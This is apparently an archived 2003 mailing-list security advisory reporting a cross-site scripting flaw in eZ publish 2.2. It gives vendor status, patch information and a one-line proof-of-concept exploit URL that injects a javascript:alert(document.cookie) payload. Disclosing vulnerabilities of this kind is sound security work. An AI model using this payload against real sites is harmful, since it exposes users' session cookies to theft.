------------------------------------------------------ EzPublish "Directory" XSS Vulnerability ------------------------------------------------------ ------------------------------------------------------ About Ezpublish; ------------------------------------------------------ PHP Based Content Management System Vendor : http://ez.no Demo : http://publishdemo.ez.no/ ------------------------------------------------------ Vulnerable; ------------------------------------------------------ eZ publish 2.2 ------------------------------------------------------ Not Vulnerable; ------------------------------------------------------ eZ publish 3 ------------------------------------------------------ Vendor Status; ------------------------------------------------------ Vendor replied and send a new version of this file. (attached) ------------------------------------------------------ Patch; ------------------------------------------------------ You can download patched file in attachment. ------------------------------------------------------ Exploit; ------------------------------------------------------ http://[victim]/index.php/article/articleview/[img%20src="javascript:alert(document.cookie)"] (Replace [], <>) Ferruh Mavituna Web Application Security Consultant Freelance Developer & Designer http://ferruh.mavituna.com ferruhat_private
This archive was generated by hypermail 2b30 : Fri May 16 2003 - 08:58:35 PDT